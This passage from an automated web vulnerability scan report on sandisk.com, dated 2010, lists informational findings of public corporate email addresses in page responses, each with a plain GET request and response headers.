<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.8. http://www.sandisk.com/SanDisk/youtube  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /SanDisk/youtube

Issue detail

The following email address was disclosed in the response:

Request

GET /SanDisk/youtube HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12581


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.9. http://www.sandisk.com/about-sandisk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40542
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.10. http://www.sandisk.com/about-sandisk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/sitemap
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40547
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.11. http://www.sandisk.com/about-sandisk/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40543
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.12. http://www.sandisk.com/about-sandisk/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/careers HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19631
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.13. http://www.sandisk.com/about-sandisk/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/careers/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19632
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.14. http://www.sandisk.com/about-sandisk/careers/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/benefits

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/careers/benefits HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.15. http://www.sandisk.com/about-sandisk/careers/career-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/career-opportunities

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/careers/career-opportunities HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18318
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.16. http://www.sandisk.com/about-sandisk/careers/employment-practices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/employment-practices

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/careers/employment-practices HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19354
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.17. http://www.sandisk.com/about-sandisk/careers/for-new-college-grads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/careers/for-new-college-grads

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/careers/for-new-college-grads HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/careers
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18058
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.18. http://www.sandisk.com/about-sandisk/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/contact-us

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/contact-us HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28653
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:IR@sandisk.com">IR@sandisk.com</a>
...[SNIP]...
<a
href="mailto:careers@sandisk.com">careers@sandisk.com</a>
...[SNIP]...
<a
href="mailto:AmericasRetailSales@sandisk.com">AmericasRetailSales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:support@sandisk.com">support@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sales_emea@sandisk.com">sales_emea@sandisk.com</a>
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com">OEMsales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:OEMsales@sandisk.com">OEMsales@sandisk.com</a>
...[SNIP]...
<a
href="mailto:dl-OEMsaleseurope@sandisk.com">dl-OEMsaleseurope@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.19. http://www.sandisk.com/about-sandisk/corporate-social-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41763
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.20. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41764
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.21. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41952
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.22. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41953
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.23. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-education  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/community-education

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/community-education HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41456
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.24. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/community-sharing-program HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15495
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:communitysharing@sandisk.com">communitysharing@sandisk.com</a>
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.25. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/employee-volunteering HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41244
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.26. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement/philanthropy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/community-engagement/philanthropy

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/community-engagement/philanthropy HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/community-engagement
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39939
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.27. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40552
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.28. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility/

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40553
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.29. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety

Issue detail

The following email address was disclosed in the response:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/health-and-safety HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility
